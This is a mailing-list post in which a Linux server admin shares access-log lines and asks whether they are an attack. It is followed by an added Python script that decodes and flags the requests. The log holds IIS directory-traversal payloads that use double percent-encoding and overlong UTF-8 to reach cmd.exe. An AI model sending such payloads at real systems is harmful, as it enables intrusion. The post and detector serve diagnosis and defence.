
[cobalt-users] access log weird stuff. hacker or virus



Hello,
I went and checked my access log and saw this stuff.
Looking for winnt on a Linux system?


 tail access
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 280 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 308 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 235 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 259 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 259 "-" "-"
[root httpd]#
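
Added example, not part of the original post: a Python triage script that decodes request paths the way a lenient server would, so the double percent-encoding and overlong 2-byte UTF-8 forms of "/" and "\" seen in the log above all collapse to the same "../" traversal. The sample lines, host name and client address are constructed, and the names normalize and classify are hypothetical helpers.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample lines in the post's layout (vhost, then combined log format).
# Host and client address are placeholders; the paths reuse encodings seen in the post.
FMT = 'www.example.com 192.0.2.10 - - [28/Sep/2001:00:30:18 -0400] "GET %s HTTP/1.0" %d 260 "-" "-"'
SAMPLE = [FMT % row for row in [
    ("/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir", 302),
    ("/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir", 302),
    ("/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir", 400),
    ("/_mem_bin/..%255c../winnt/system32/cmd.exe?/c+dir", 302),
    ("/index.html", 200),
]]
LINE_RE = re.compile(r'^(\S+) (\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')

def normalize(path):
    """Return (decoded path, percent-decoding rounds needed, overlong UTF-8 seen)."""
    raw, rounds = path.split("?", 1)[0].encode("latin-1", "replace"), 0
    while rounds < 5:                      # decode until stable: %255c -> %5c -> \
        nxt = unquote_to_bytes(raw)
        if nxt == raw:
            break
        raw, rounds = nxt, rounds + 1
    out, overlong, i = bytearray(), False, 0
    while i < len(raw):
        # Lead bytes 0xC0/0xC1 never occur in valid UTF-8; a lenient decoder folds
        # the pair to one ASCII byte (0xC0 0xAF -> '/', 0xC1 0x1C -> '\').
        if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            overlong, i = True, i + 2
        else:
            out.append(raw[i])
            i += 1
    return out.decode("latin-1").replace("\\", "/"), rounds, overlong

def classify(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    _vhost, client, path, status = m.groups()
    norm, rounds, overlong = normalize(path)
    reasons = ["traversal"] if ".." in norm.split("/") else []
    if rounds > 1:
        reasons.append("double-encoded")
    if overlong:
        reasons.append("overlong-utf8")
    return {"client": client, "status": int(status), "path": norm, "reasons": reasons}

if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry))
```

The status field is worth reporting next to the reasons: every probe in the log above was answered with 302 or 400 rather than 200.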